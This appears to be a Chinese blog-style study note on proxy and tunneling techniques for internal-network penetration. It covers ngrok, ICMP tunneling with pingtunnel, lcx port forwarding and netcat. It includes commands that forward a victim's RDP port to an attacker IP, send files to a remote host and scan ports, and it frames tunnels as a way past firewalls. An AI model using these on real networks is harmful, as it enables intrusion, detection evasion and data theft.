type
status
date
slug
summary
tags
category
icon
password
0x00 内网渗透为什么使用代理与隧道技术
简单的来讲,当拿到某网络主机的权限,发现无法将流量或者权限发送出来,对渗透造成了很大的影响,所以内网渗透必须需要了解到两个技术知识,代理与隧道技术。
1)代理技术解决的问题:代理简单来讲解决网络之间的通信问题,如内网与外网之间或者两者自己之间的通信,两个不同内网的通信就必须借助到代理,否则无法通讯。2)隧道技术解决的问题:简单来讲就是解决流量无法发送,隧道技术多用来绕过一些安全设备的监控,如防火墙过滤问题,网络连接通讯问题,数据回链封装问题,对我们发送的流量进行了拦截,这个时候需要接触隧道技术绕过拦截,隧道技术就是使用不同的协议把走不通的路走通。走不同的协议技术建立通讯,可以说是其中也包括了一些代理的技术。
0x01 代理技术-Ngrok穿透双内网
代理思路:将两台不同内网主机,上线其中一台包含网络的受害机,payload设置其将流量转发至代理,在使用攻击机接受代理流量即可,测试ngrok不太稳定,建议搭建Frp代理,代理参考网站:https://www.ngrok.cc/
0x02 隧道技术学习
隧道技术使用在不同的网络层进行,大体总结了以下三种:
网络层:IPV6隧道,ICMP隧道
传输层:TCP隧道,UDP隧道,常规的端口转发
应用层:SSH隧道,HTTP/S隧道,DNS隧道
需要注意的是,使用某种隧道之前,需要检查环境本身是否支持这种协议的使用,才能去使用响应的隧道传输
连通性检测:
- TCP 协议 用“瑞士军刀”——netcat 执行 nc 命令:nc <端口>
- HTTP 协议 用“curl”工具,执行 curl <IP 地址:端口>命令。如果远程主机开启了相应的端口,且内网可连接外网的 话,就会输出相应的端口信息
- ICMP 协议 用“ping”命令,执行 ping <IP 地址/域名>
- DNS 协议 检测 DNS 连通性常用的命令是“nslookup”和“dig” nslookup 是 windows 自带的 DNS 探测命令 dig 是 linux 系统自带的 DNS 探测命令
案例1)网络层ICMP隧道:
环境:kali(黑客)-pc1-pc2(pc1上面存在两张网卡,可与pc2相同也可以与kali相通)
隧道工具介绍: pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具-p ##表示连接 icmp 隧道另一端的机器 IP(即目标服务器)-lp ##表示需要监听的本地 tcp 端口-da ##指定需要转发的机器的 IP(即目标内网某一机器的内网 IP)-dp ##指定需要转发的机器的端口(即目标内网某一机器的内网端口)-x ##设置连接的密码连接前使用ping命令检测是否存在icmp协议
工具学习连接:
老版本介绍:https://github.com/f1vefour/ptunnel(需自行编译)
新版本介绍:https://github.com/esrrhs/pingtunnel(二次开发版)
案例2)传输层端口转发隧道:
工具使用:
windows: lcx 学习链接:https://github.com/UndefinedIdentifier/LCX
linux:portmap 学习链接:github
lcx转发流程:1.lcx -slave 攻击 IP 3131 127.0.0.1 3389 //将本地 3389 给攻击 IP 的 33332.lcx -listen 3333 4444 //监听 3333 转发至 4444
案例3)传输层转发隧道 Netcat 使用
(1):nc的正向连接与反向连接
正向:攻击机主动连接受害机
反向:受害机连接攻击机
(2)反向配合端口转发:
(3)相关 netcat 主要功能测试
指纹服务:nc -nv 192.168.213.132端口扫描:nc -v -z 192.168.213.132 1-100端口监听:nc -lvp xxxx文件传输:nc -lp 1111 >1.txt|nc -vn xx.xx.x.x 1111 <1.txt-q 1反弹 Shell:见上
提供参考学习,多找百度咨询问题/狗头
交流学习:CSND社区:告白热